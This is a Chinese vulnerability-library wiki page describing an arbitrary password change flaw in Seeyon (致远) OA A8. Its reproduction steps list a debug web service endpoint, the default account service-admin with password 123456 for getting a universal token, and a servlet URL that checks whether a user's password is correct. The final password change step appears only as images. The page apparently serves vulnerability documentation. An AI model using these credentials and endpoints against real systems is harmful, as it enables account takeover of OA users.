menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 致远oa chevron_right 致远OA A8 任意用户密码修改漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    致远OA A8 任意用户密码修改漏洞.md
    878 B / 2021-04-21 09:23:46
        致远OA A8 任意用户密码修改漏洞
    ==============================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    致远OA A8
    
    三、复现过程
    ------------
    
        http://www.0-sec.org/seeyon/services/authorityService?wsdl
    
    通过调试接口的默认用户 userName:service-admin password:123456
    获取万能Token之后可以修改任意用户密码。
    
    ![](./resource/致远OAA8任意用户密码修改漏洞/media/rId24.png)
    
    访问
    
        http://www.0-sec.org/seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=zw&P_2_String=wooyun
    
    返回false 说明zw密码不正确
    
    ![](./resource/致远OAA8任意用户密码修改漏洞/media/rId25.png)
    
    修改密码
    
    ![](./resource/致远OAA8任意用户密码修改漏洞/media/rId26.png)
    
    ![](./resource/致远OAA8任意用户密码修改漏洞/media/rId27.shtml)
    
    
    links
    file_download